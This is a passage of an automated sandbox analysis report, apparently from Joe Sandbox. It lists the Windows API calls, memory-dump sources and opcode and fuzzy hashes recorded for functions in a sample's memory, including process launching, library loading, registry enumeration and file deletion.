                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 0103B903
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0103B998
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103B9C7
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: <$@
                                                                                                                                                                                                                                                                                                        • API String ID: 146682121-1426351568
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01017B6D
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 01017BA3
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 01017BB4
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01017C36
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                                                                        • Opcode ID: fc59a22d37340aeb5fb0c26464ad9092d16f070e8b84f72d15a5e262c3c7f1b4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 410bef98a584880fb3d7fba1ab38b60f3f3572acc1351200757415cac95cd447
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc59a22d37340aeb5fb0c26464ad9092d16f070e8b84f72d15a5e262c3c7f1b4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8841C0B1600208EFDB15DF64C884A9A7BB9EF54310F1080ADAD469F20AD7B9D940CBA0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010448D1
                                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 010448E6
                                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0104492E
                                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 01044941
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: df5e5e2a336a3d0625b4fbc9795ae91f75145b895082bfe85e382d5d214a91fc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 34556b03b19ab0aad7b4f3164e4525715d022ace08a4c6e31310495748c79cb0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df5e5e2a336a3d0625b4fbc9795ae91f75145b895082bfe85e382d5d214a91fc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3414AB9A00209EFEB20CF55D8C4AAEBBF9FF05364F044169E99597240C735ED45DBA0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010145FD: GetClassNameW.USER32(?,?,000000FF), ref: 01014620
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 010127B3
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 010127C6
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 010127F6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                        • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                                        • Opcode ID: 4e7ed8c09a608eed05a7748a6f15885fa57e8fd0afb1c1b554c07cf447ce673c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 085c6aa242425fce0e150320ebe5c40bbb45c13f8df1f513ee61f560e643f713
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4e7ed8c09a608eed05a7748a6f15885fa57e8fd0afb1c1b554c07cf447ce673c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89214375A00008BFDB14ABA4DC85CFF7BB8DF45360B144129F8A2A71E1CB3D480ADB60
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01043A29
                                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 01043A30
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01043A45
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 01043A4D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                        • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                        • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                        • Opcode ID: 226d3f4060b0445810268e3a085063f1d9a84ca1c6554084bcb0ead52d912658
                                                                                                                                                                                                                                                                                                        • Instruction ID: 050a8da6510873f19e697cb682e17e70f7d8dbd19b27b5cd501b4a6a34884a77
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 226d3f4060b0445810268e3a085063f1d9a84ca1c6554084bcb0ead52d912658
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0721A1B5A40215BBEF119E68DCC4FBB77E9FB44364F106228FA919A191C371CC609760
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FD508E,?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002), ref: 00FD50FD
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FD5110
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00FD508E,?,?,00FD502E,?,010798D8,0000000C,00FD5185,?,00000002,00000000), ref: 00FD5133
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                        • Opcode ID: 01472beeae1e672b8a4b7bdbf7ee47b221172cde1fc8b5285dab127d77c205dc
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7a61ae35505a29528ec45fb20382131ec090a089d86ea2d5900a9db7bc18de21
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01472beeae1e672b8a4b7bdbf7ee47b221172cde1fc8b5285dab127d77c205dc
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76F0C874A0020CBBDB215FD4DD59BADBFB5EF14B52F0400A9F845A2250DB795D40DB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32 ref: 0100E785
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0100E797
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0100E7BD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                        • Opcode ID: cb247b5bf35f8d6143cad0eae10efcbf5ced8ad98fc4c7839a4c3516cafd09cf
                                                                                                                                                                                                                                                                                                        • Instruction ID: fb32a86ee943d0244fd63c64a5970fe25b8754a90bf90e9b35682e108229fec4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb247b5bf35f8d6143cad0eae10efcbf5ced8ad98fc4c7839a4c3516cafd09cf
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E0E5F5902511ABF7775660DD98E6D76246B24B40F040998EDC5B2091EB31C944C795
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB664A
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB665C
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00FB668B,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB666E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2573b2a348ae317a05399f5b8e71c34ff0e746825d80d2599f2fd6108ac8de64
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42cac8a2577bfd7c88c43943fe30558fcc819bd4669d192d618cce77210c7843
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2573b2a348ae317a05399f5b8e71c34ff0e746825d80d2599f2fd6108ac8de64
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DE0CDBAF025226792311767BC6CBAE77699FA2F32B050119FD40D6204DF5CCC018BE8
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6610
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB6622
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00FF5657,?,?,00FB62FA,?,00000001,?,?,00000000), ref: 00FB6635
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                        • Opcode ID: 19bafc3e4d70bbe221e87e964b2e464142d8759271d15bff20a36e13b6b805e6
                                                                                                                                                                                                                                                                                                        • Instruction ID: fcff62186964b777c71b33599ef088710ce8401abe50fccedc58e301e19fb228
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 19bafc3e4d70bbe221e87e964b2e464142d8759271d15bff20a36e13b6b805e6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0D012B9E12532674232266A6968ACE7B159EA1F213050065BC40EA218CF69CD01DF98
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010235C4
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 01023646
                                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0102365C
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102366D
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0102367F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0103AE87
                                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0103AE95
                                                                                                                                                                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0103AEC8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103B09D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C505
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C560
                                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0103C5C3
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 0103C606
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C613
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0101D7CD,?), ref: 0101E714
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0101D7CD,?), ref: 0101E72D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0101ED8A
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101EDC3
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101EF02
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0101EF1A
                                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0101EF67
                                                                                                                                                                                                                                                                                                        Memory Dump Source
